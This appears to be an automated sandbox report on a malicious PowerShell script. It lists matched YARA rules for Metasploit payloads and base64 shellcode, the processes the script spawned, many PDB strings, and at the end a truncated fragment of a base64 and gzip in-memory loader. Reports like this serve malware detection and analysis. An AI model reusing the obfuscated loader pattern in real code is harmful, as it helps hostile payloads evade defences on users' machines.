Source: 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPED	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPED	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =

Source: classification engine

Classification label: mal96.troj.evad.winPS1@9/14@0/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210706

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5964

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odvubcus.q0n.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used in galleries to represen

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: a.ps1	Virustotal: Detection: 50%
Source: a.ps1	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Configuration.Install.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: anagement.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Data.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: umerics.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Numerics.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbTR source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb! source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: .textn.pdb ` source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: gpapi.pdbG source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.DirectoryServices.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: anagement.pdb&& source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: onfiguration.Install.pdbLL source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: atl.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: MpOAV.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb\ source: WerFault.exe, 0000000D.00000003.738499813.00000000052BD000.00000004.00000001.sdmp
Source:	Binary string: onfiguration.Install.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.DirectoryServices.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb""F` source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb4 source: WER4735.tmp.dmp.13.dr
Source:	Binary string: clrjit.pdb9 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.Install.pdbH source: WER4735.tmp.dmp.13.dr
Source:	Binary string: gpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: ore.pdb{{ source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Transactions.pdb% source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.Install.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: System.Management.Automation.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: WER4735.tmp.dmp.13.dr
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbf source: WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Management.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER4735.tmp.dmp.13.dr
Source:	Binary string: dpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: powershell.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdbo source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: version.pdb/ source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Numerics.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: t.PowerShell.ConsoleHost.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Management.Automation.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WER4735.tmp.dmp.13.dr
Source:	Binary string: MpOAV.pdbs source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Management.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb_ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb5 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb- source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.pdbD source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: dpapi.pdbQ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: MpClient.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdb_ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: userenv.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: irectoryServices.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Data.pdbu source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: System.Transactions.pdb\ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: t.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS)m source: WER4735.tmp.dmp.13.dr
Source:	Binary string: ll.Commands.Utility.pdb^ source: powershell.exe, 00000005.00000000.706645322.0000000008789000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb3 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: ransactions.pdbnn source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: ore.ni.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Management.Automation.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: ore.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb2 source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdbT3yk source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: Amsi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: umerics.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: ransactions.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Transactions.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbp source: WER4735.tmp.dmp.13.dr
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp

Data Obfuscation:

Found suspicious powershell code related to unpacking or dynamic code loading

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: NewEngineState=Available$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAK1Xa2/iShL9HH6FP0QCFALmESAjjTRtjMGEt8E8cqPI2G3T0H7EbmPDnfnvWzaQm9nJ7I60i2TRbldVnz51ulxWMLtXmE90NnANzN2r	Jump to behavior
